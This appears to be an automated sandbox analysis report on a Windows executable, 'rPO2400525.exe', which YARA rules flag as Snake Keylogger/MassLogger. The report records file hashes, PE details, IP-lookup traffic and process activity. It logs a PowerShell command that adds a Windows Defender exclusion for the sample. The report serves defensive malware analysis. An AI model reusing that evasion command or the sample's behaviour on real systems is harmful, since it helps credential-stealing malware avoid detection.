                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.379460230152629
                                                      Encrypted:false
                                                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:fLHyIFKL3IZ2KRH9Ougss
                                                      MD5:47AE6B38874AA66FC6688784E5F2EF18
                                                      SHA1:AF71A58235AE5D80BDDA79DE907697354E5553F6
                                                      SHA-256:F271AAB7854518D80F39793CBA35D7BFDABBFBCAC9DBD8F5E79EAE393BDC4C98
                                                      SHA-512:D8FD735141FBF25FE4EFB88E973F4416A50EC0E065A297BC8B398FF96AD77EE852EA2E66BD3CAFED7C4C9EE9D24742C3D95F03DD13DBC6C1B57BFDB2F40EF1A3
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qmsaufu.3a1.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zb5losx.c4q.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cltzt1ql.o42.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqjgxwgc.zff.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.641117860261824
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:rPO2400525.exe
                                                      File size:626'688 bytes
                                                      MD5:9393c3e2268fe4c15da55f0d5233245d
                                                      SHA1:ecc0ea51def475cd0facc10c5911c0546d6cd835
                                                      SHA256:8ea6427ed08636f4220611662424cdf09103fecdb4ef6a0c15103c715364fbf3
                                                      SHA512:f2a6cecd7f3757c29b7bc9c1fc824d5582d0e1ab9346c23f4b2c3a4f1163dba1dc23df8fdf17bd2078046a1f228f49926d8f61c144970cb7cc9803eb7ca8ebd9
                                                      SSDEEP:12288:3gPGbnb4cZOlRz2Gfp8LjRLJl7E9u7R5f5BL9Cb771kUKYDTPm:QAjgKGSjRtlg9sl79Q77f1e
                                                      TLSH:CBD4CED03B36731ADE695934D198DEB582B51E68B001FAF6A9DC3F97358C2129E0CF42
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Fv................0..~..........^.... ........@.. ....................................`................................

                                                      File Icon

                                                      Icon Hash:9898a6a698a62688

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x499c5e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x84197646 [Sun Mar 25 04:06:30 2040 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add eax, dword ptr [eax]
                                                      add byte ptr [eax], al
                                                      add al, 00h
                                                      add byte ptr [eax], al
                                                      add eax, 06000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], cl
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], cl
                                                      add byte ptr [eax], al
                                                      add byte ptr [edi], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ebx], cl

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x99c0c0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000xd24.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x99bf00x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x97d640x97e00e24a3bdb56c0773a69f39d1b6d0fe9aeFalse0.850344007201646data7.650200393910615IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x9a0000xd240xe006a3d2db41ff2271ed4fb9761dafd9fbfFalse0.36746651785714285data5.6730109295035005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x9c0000xc0x200bb1b743871579a2729b4c7c512d90f84False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x9a0c80x8edPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.3846827133479212
                                                      RT_GROUP_ICON0x9a9c80x14data1.05
                                                      RT_VERSION0x9a9ec0x334data0.4304878048780488

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      Comments
                                                      CompanyName
                                                      FileDescriptionSakk Alkalmazs 2.0
                                                      FileVersion1.0.0.0
                                                      InternalNameRjYY.exe
                                                      LegalCopyrightCopyright 2021
                                                      LegalTrademarks
                                                      OriginalFilenameRjYY.exe
                                                      ProductNameSakk Alkalmazs 2.0
                                                      ProductVersion1.0.0.0
                                                      Assembly Version1.0.0.0

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-02-19T04:01:19.392226+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706193.122.130.080TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Feb 19, 2025 04:01:16.576821089 CET4970680192.168.2.5193.122.130.0
                                                      Feb 19, 2025 04:01:16.582062960 CET8049706193.122.130.0192.168.2.5
                                                      Feb 19, 2025 04:01:16.582323074 CET4970680192.168.2.5193.122.130.0
                                                      Feb 19, 2025 04:01:16.582699060 CET4970680192.168.2.5193.122.130.0
                                                      Feb 19, 2025 04:01:16.587691069 CET8049706193.122.130.0192.168.2.5
                                                      Feb 19, 2025 04:01:19.232677937 CET8049706193.122.130.0192.168.2.5
                                                      Feb 19, 2025 04:01:19.238214016 CET4970680192.168.2.5193.122.130.0
                                                      Feb 19, 2025 04:01:19.243350983 CET8049706193.122.130.0192.168.2.5
                                                      Feb 19, 2025 04:01:19.350572109 CET8049706193.122.130.0192.168.2.5
                                                      Feb 19, 2025 04:01:19.365951061 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:19.365993023 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:19.366092920 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:19.379524946 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:19.379539967 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:19.392225981 CET4970680192.168.2.5193.122.130.0
                                                      Feb 19, 2025 04:01:19.846616030 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:19.846952915 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:19.888998032 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:19.889014006 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:19.889379025 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:19.939703941 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:20.066951990 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:20.107338905 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:20.184815884 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:20.184887886 CET44349708104.21.64.1192.168.2.5
                                                      Feb 19, 2025 04:01:20.184936047 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:01:20.194380045 CET49708443192.168.2.5104.21.64.1
                                                      Feb 19, 2025 04:02:24.354976892 CET8049706193.122.130.0192.168.2.5
                                                      Feb 19, 2025 04:02:24.355067968 CET4970680192.168.2.5193.122.130.0
                                                      Feb 19, 2025 04:02:59.363548040 CET4970680192.168.2.5193.122.130.0
                                                      Feb 19, 2025 04:02:59.368768930 CET8049706193.122.130.0192.168.2.5

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Feb 19, 2025 04:01:16.460906982 CET5591853192.168.2.51.1.1.1
                                                      Feb 19, 2025 04:01:16.468204975 CET53559181.1.1.1192.168.2.5
                                                      Feb 19, 2025 04:01:19.353993893 CET5910953192.168.2.51.1.1.1
                                                      Feb 19, 2025 04:01:19.365143061 CET53591091.1.1.1192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Feb 19, 2025 04:01:16.460906982 CET192.168.2.51.1.1.10xbf60Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.353993893 CET192.168.2.51.1.1.10x18f2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Feb 19, 2025 04:01:16.468204975 CET1.1.1.1192.168.2.50xbf60No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                      Feb 19, 2025 04:01:16.468204975 CET1.1.1.1192.168.2.50xbf60No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:16.468204975 CET1.1.1.1192.168.2.50xbf60No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:16.468204975 CET1.1.1.1192.168.2.50xbf60No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:16.468204975 CET1.1.1.1192.168.2.50xbf60No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:16.468204975 CET1.1.1.1192.168.2.50xbf60No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.365143061 CET1.1.1.1192.168.2.50x18f2No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.365143061 CET1.1.1.1192.168.2.50x18f2No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.365143061 CET1.1.1.1192.168.2.50x18f2No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.365143061 CET1.1.1.1192.168.2.50x18f2No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.365143061 CET1.1.1.1192.168.2.50x18f2No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.365143061 CET1.1.1.1192.168.2.50x18f2No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                      Feb 19, 2025 04:01:19.365143061 CET1.1.1.1192.168.2.50x18f2No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • reallyfreegeoip.org
                                                      • checkip.dyndns.org

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549706193.122.130.0802380C:\Users\user\Desktop\rPO2400525.exe
                                                      TimestampBytes transferredDirectionData
                                                      Feb 19, 2025 04:01:16.582699060 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Feb 19, 2025 04:01:19.232677937 CET321INHTTP/1.1 200 OK
                                                      Date: Wed, 19 Feb 2025 03:01:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 104
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: af306719f6221e4bc615bd261ccad5af
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                      Feb 19, 2025 04:01:19.238214016 CET127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Feb 19, 2025 04:01:19.350572109 CET321INHTTP/1.1 200 OK
                                                      Date: Wed, 19 Feb 2025 03:01:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 104
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 59bded412b60bfd4627ad9877f4c7ffc
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549708104.21.64.14432380C:\Users\user\Desktop\rPO2400525.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-02-19 03:01:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2025-02-19 03:01:20 UTC856INHTTP/1.1 200 OK
                                                      Date: Wed, 19 Feb 2025 03:01:20 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 362
                                                      Connection: close
                                                      Age: 165848
                                                      Cache-Control: max-age=31536000
                                                      cf-cache-status: HIT
                                                      last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFcxOc%2F5e1ezrFHNw5fuRtvyd7oXe90P1SK5Cgm60pLtZLz39sQvxXhSJwi0Gy7r0%2FjzLLAZmZYmGLGg6XtoLJmsBaf%2B6A6J3tcg3uhHor1KS5Tqorw7l5DQX%2FafH5Ndhds42oAo"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 91430300ba19c358-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1679&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1646926&cwnd=155&unsent_bytes=0&cid=4fe165ca23b5aebf&ts=352&x=0"
                                                      2025-02-19 03:01:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:22:01:13
                                                      Start date:18/02/2025
                                                      Path:C:\Users\user\Desktop\rPO2400525.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\rPO2400525.exe"
                                                      Imagebase:0x240000
                                                      File size:626'688 bytes
                                                      MD5 hash:9393C3E2268FE4C15DA55F0D5233245D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2096199828.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:22:01:14
                                                      Start date:18/02/2025
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"
                                                      Imagebase:0x110000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:22:01:14
                                                      Start date:18/02/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
